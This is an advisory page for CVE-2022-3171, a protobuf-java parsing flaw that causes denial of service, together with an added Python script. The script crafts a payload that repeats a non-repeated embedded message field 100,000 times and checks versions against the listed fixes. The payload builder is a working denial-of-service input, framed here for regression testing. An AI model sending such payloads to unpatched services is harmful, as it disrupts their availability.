CVE-2022-3171 MEDIUM

CVE-2022-3171: Memory handling vulnerability in ProtocolBuffers Java core and lite

Vendor Google Llc
Product Protocolbuffers
Weakness CWE-20 · Input validation
Published October 12, 2022
Last update April 21, 2025

CVSS base score

4.3/10
Attack vector Adjacent
Attack complexity Low
Privileges required None
User interaction None
Scope Unchanged
Confidentiality None
Integrity None
Availability Low

CVSS vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

What the vulnerability does

Description

A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service. Inputs containing multiple instances of a non-repeated embedded message field, where the embedded messages carry repeated or unknown fields, cause the parsed objects to be converted back and forth between mutable and immutable forms as each instance is merged into the one before it, resulting in potentially long garbage collection pauses. Update to the versions listed above or a later release.
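The following script is an added illustration for this advisory, not code from the protobuf project or the CVE record. It builds raw protobuf wire-format bytes with the shape the description refers to (one non-repeated embedded message field, here field number 1 of a hypothetical Outer message, emitted many times, each instance carrying a repeated field and an unknown field of a hypothetical Inner message), walks the result to confirm the field repetition, and applies the advisory's fixed-version thresholds to a protobuf-java version string. The Outer/Inner schema, the field numbers, and the rule that minor lines without a listed fix (3.17, 3.18) are treated as affected are assumptions for the example. The bytes are meant as a regression input to feed to your own protobuf-java build; the script itself makes no claim about how long any particular version will pause.

```python
"""Added example for CVE-2022-3171 (not protobuf project code)."""
from typing import Dict, List, Tuple

VARINT = 0             # wire type 0
LENGTH_DELIMITED = 2   # wire type 2 (embedded messages, strings, bytes)


def encode_varint(value: int) -> bytes:
    """Base-128 varint as used by the protobuf wire format."""
    if value < 0:
        raise ValueError("only non-negative values are encoded here")
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def encode_tag(field_number: int, wire_type: int) -> bytes:
    return encode_varint((field_number << 3) | wire_type)


def encode_varint_field(field_number: int, value: int) -> bytes:
    return encode_tag(field_number, VARINT) + encode_varint(value)


def encode_message_field(field_number: int, payload: bytes) -> bytes:
    return encode_tag(field_number, LENGTH_DELIMITED) + encode_varint(len(payload)) + payload


def build_inner(repeated_values: List[int], unknown_field_number: int) -> bytes:
    # Hypothetical Inner schema: field 1 = repeated int32 (non-packed).
    # unknown_field_number is one Inner does NOT declare, so a parser keeps it
    # as an unknown field rather than dropping it.
    body = b"".join(encode_varint_field(1, v) for v in repeated_values)
    body += encode_varint_field(unknown_field_number, 1)
    return body


def build_pathological_payload(occurrences: int) -> bytes:
    # Hypothetical Outer schema: field 1 = Inner inner (NOT repeated).
    # The same field is emitted `occurrences` times in one message; merge
    # semantics require every instance to be folded into the single Inner value.
    inner = build_inner([1, 2, 3], unknown_field_number=99)
    return b"".join(encode_message_field(1, inner) for _ in range(occurrences))


def decode_varint(data: bytes, pos: int) -> Tuple[int, int]:
    result, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def count_field_occurrences(data: bytes) -> Dict[int, int]:
    """Count top-level occurrences of each field number in a serialized message.
    A count above 1 for a non-repeated message field is the condition the
    advisory describes (the parser must merge each instance into the last)."""
    counts: Dict[int, int] = {}
    pos = 0
    while pos < len(data):
        key, pos = decode_varint(data, pos)
        field_number, wire_type = key >> 3, key & 0x7
        if wire_type == VARINT:
            _, pos = decode_varint(data, pos)
        elif wire_type == LENGTH_DELIMITED:
            length, pos = decode_varint(data, pos)
            pos += length
        elif wire_type == 1:   # 64-bit fixed
            pos += 8
        elif wire_type == 5:   # 32-bit fixed
            pos += 4
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        if pos > len(data):
            raise ValueError("truncated message")
        counts[field_number] = counts.get(field_number, 0) + 1
    return counts


# Fixed patch level per minor line, taken from the advisory text.
FIXED_IN = {(3, 16): 3, (3, 19): 6, (3, 20): 3, (3, 21): 7}


def is_fixed_version(version: str) -> bool:
    """True if a protobuf-java version string carries the fix per the advisory.
    Assumption: minor lines with no listed fix (3.17, 3.18) are treated as affected;
    anything newer than the 3.21 line is later than 3.21.7 and counts as fixed."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if (major, minor) > (3, 21):
        return True
    fixed_patch = FIXED_IN.get((major, minor))
    return fixed_patch is not None and patch >= fixed_patch


if __name__ == "__main__":
    payload = build_pathological_payload(100_000)
    with open("cve-2022-3171-regression.bin", "wb") as f:
        f.write(payload)
    print(len(payload), "bytes;", count_field_occurrences(payload)[1], "instances of field 1")
```

Running the script writes the constructed bytes to a file that can be handed to the Outer message's parseFrom in a protobuf-java test harness; compare parse time on an affected version against one of the fixed releases before and after the dependency upgrade.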

Key dates

Disclosure timeline

October 12, 2022 CVE published
April 21, 2025 Record updated